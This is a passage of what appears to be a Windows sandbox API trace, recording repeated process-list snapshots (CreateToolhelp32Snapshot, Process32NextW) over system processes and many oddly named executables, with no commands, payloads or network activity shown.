th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0134.744] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0134.746] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0134.750] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0134.751] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0134.752] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0134.754] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0134.755] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0134.757] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0134.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0134.759] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0134.760] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0134.762] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0134.763] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0134.765] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0134.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0134.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0134.770] CloseHandle (hObject=0xbc) returned 1 [0134.770] Sleep (dwMilliseconds=0x12c) [0135.153] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0135.158] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0135.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0135.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0135.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0135.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0135.163] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0135.164] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0135.165] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.165] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.166] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.167] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.168] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.169] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0135.169] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.170] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.171] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0135.172] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.173] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.174] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0135.175] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0135.176] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0135.178] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.179] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.180] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0135.181] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0135.183] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0135.184] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0135.185] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0135.186] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0135.187] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0135.188] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0135.189] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0135.191] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0135.192] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0135.193] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0135.194] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0135.195] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0135.196] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0135.197] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0135.198] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0135.200] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0135.201] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0135.245] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0135.246] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.247] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0135.248] CloseHandle (hObject=0xc4) returned 1 [0135.248] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0135.253] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.254] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0135.254] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0135.255] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0135.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.257] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0135.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0135.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0135.259] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0135.260] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.260] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.261] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.262] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.262] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.263] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0135.264] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 